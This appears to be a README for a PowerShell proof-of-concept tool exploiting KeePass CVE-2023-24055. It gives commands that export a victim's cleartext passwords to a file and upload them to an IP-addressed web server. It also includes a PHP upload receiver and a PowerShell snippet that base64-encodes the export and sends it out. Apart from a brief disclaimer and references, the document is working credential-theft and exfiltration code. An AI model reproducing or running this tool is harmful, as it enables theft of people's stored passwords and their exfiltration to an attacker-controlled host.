This script is for educational and demonstration purposes only. The author does not endorse or condone the use of this script for any criminal or malicious activities and it should only be used where explicitly allowed with proper permission.
This script should be used with caution, as it will alter the KeePass configuration file and delete any previously configured triggers. Use of this script may result in unexpected behavior and potentially break the KeePass application. Use at your own risk.
This script demonstrates the ** DISPUTED ** vulnerability (CVE-2023-24055) of KeePass through version 2.53 (in a default installation) as it allows an attacker with write access to the XML configuration file to obtain the cleartext passwords by adding an export trigger. Note that the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.
Reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055
- https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
- https://keepass.info/
To use this script, run it in PowerShell and provide the necessary parameters. The mandatory parameters are:
-filename
: The full file path and name of the file for the passwords to be exported.
The optional parameters are:
-uploadURL
: This switch is used to specify that the data should be uploaded to the specified URL.-url
: The URL to which the data should be uploaded.
Export cleartext passwords:
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt
Export cleartext passwords and upload export to web server:
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt -uploadURL http://192.168.238.141/KeePass/upload.php
Detailed help:
get-help .\KlearPass.ps1 -Detailed
<?php
if (!empty($_POST['filename']) && !empty($_POST['data'])) {
$target_directory = '/var/www/html/KeePass/uploads/';
$filename = $target_directory . $_POST['filename'];
$data = base64_decode($_POST['data']);
file_put_contents($filename, $data);
}
?>
$filename = "c:\windows\tasks\export.txt";
$file = [System.IO.Path]::GetFileName($filename);
$encodedFile = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($filename)));
$http = New-Object System.Net.WebClient;
$http.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$http.UploadString("http://192.168.238.141/KeePass/upload.php", "filename=$file&data=$encodedFile");
- Script initially based off code found in https://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeePassConfig.ps1
- Idea of exfiltrating the export is credited to https://github.com/alt3kx/CVE-2023-24055_PoC.